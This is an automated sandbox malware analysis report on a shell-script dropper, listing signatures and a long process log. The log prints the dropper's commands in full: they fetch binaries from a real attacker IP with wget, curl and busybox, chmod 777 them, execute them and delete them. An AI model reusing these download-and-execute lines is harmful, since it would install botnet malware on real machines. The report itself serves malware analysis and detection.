Malware Analysis Report

2024-12-07 16:36

Sample ID 241114-c4zs5stcnh
Target 74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
SHA256 74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc

Threat Level: Shows suspicious behavior

The file 74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-14 02:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-14 02:38

Reported

2024-11-14 02:41

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

31s

Max time network

129s

Command Line

[/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I N/A
N/A /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS N/A
N/A /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd N/A
N/A /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS N/A
N/A /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi N/A
N/A /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed N/A
N/A /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE N/A
N/A /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ N/A
N/A /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak N/A
N/A /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ N/A
N/A /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F N/A
N/A /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L N/A
N/A /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG N/A
N/A /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt N/A
N/A /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS N/A
N/A /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd N/A
N/A /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS N/A
N/A /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I N/A
N/A /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed N/A
N/A /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE N/A
N/A /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ N/A
N/A /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi N/A
N/A /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak N/A
N/A /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ N/A
N/A /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F N/A
N/A /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L N/A
N/A /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG N/A
N/A /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /usr/bin/curl N/A
File opened for modification /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /usr/bin/curl N/A
File opened for modification /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /usr/bin/curl N/A
File opened for modification /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /usr/bin/curl N/A
File opened for modification /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /usr/bin/curl N/A
File opened for modification /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /usr/bin/curl N/A
File opened for modification /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /usr/bin/curl N/A
File opened for modification /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /usr/bin/curl N/A
File opened for modification /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /usr/bin/curl N/A
File opened for modification /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /usr/bin/curl N/A
File opened for modification /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /usr/bin/curl N/A
File opened for modification /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /usr/bin/curl N/A
File opened for modification /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /usr/bin/curl N/A
File opened for modification /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /usr/bin/curl N/A
File opened for modification /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /usr/bin/curl N/A
File opened for modification /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /usr/bin/curl N/A
File opened for modification /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /usr/bin/curl N/A
File opened for modification /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /usr/bin/curl N/A
File opened for modification /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /usr/bin/curl N/A
File opened for modification /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /usr/bin/curl N/A
File opened for modification /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /usr/bin/curl N/A
File opened for modification /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /usr/bin/curl N/A
File opened for modification /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /usr/bin/curl N/A
File opened for modification /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /usr/bin/curl N/A
File opened for modification /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /usr/bin/curl N/A
File opened for modification /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /usr/bin/curl N/A
File opened for modification /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /usr/bin/curl N/A
File opened for modification /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /usr/bin/curl N/A

Processes

/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh

[/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/chmod

[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I

[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/rm

[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/usr/bin/wget

[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/chmod

[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS

[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/rm

[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/usr/bin/wget

[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/chmod

[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd

[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/rm

[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/usr/bin/wget

[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/chmod

[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS

[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/rm

[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/usr/bin/wget

[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/chmod

[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi

[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/rm

[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/usr/bin/wget

[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/chmod

[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed

[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/rm

[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/usr/bin/wget

[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/chmod

[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE

[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/rm

[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/usr/bin/wget

[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/chmod

[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ

[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/rm

[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/chmod

[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak

[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/rm

[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/usr/bin/wget

[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/bin/chmod

[chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ

[./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/bin/rm

[rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/bin/chmod

[chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F

[./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/bin/rm

[rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/usr/bin/wget

[wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/bin/chmod

[chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L

[./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/bin/rm

[rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/usr/bin/wget

[wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/bin/chmod

[chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG

[./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/bin/rm

[rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/usr/bin/wget

[wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/bin/chmod

[chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt

[./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/bin/rm

[rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/usr/bin/wget

[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/chmod

[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS

[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/rm

[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/usr/bin/wget

[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/chmod

[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd

[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/rm

[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/usr/bin/wget

[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/chmod

[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS

[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/rm

[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/usr/bin/wget

[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/chmod

[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I

[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/rm

[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/usr/bin/wget

[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/chmod

[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed

[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/rm

[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/usr/bin/wget

[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/chmod

[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE

[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/rm

[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/usr/bin/wget

[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/chmod

[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ

[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/rm

[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/chmod

[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi

[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/rm

[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/usr/bin/wget

[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/chmod

[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak

[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/rm

[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/usr/bin/wget

[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/bin/chmod

[chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ

[./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/bin/rm

[rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/bin/chmod

[chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F

[./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/bin/rm

[rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/usr/bin/wget

[wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/bin/chmod

[chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L

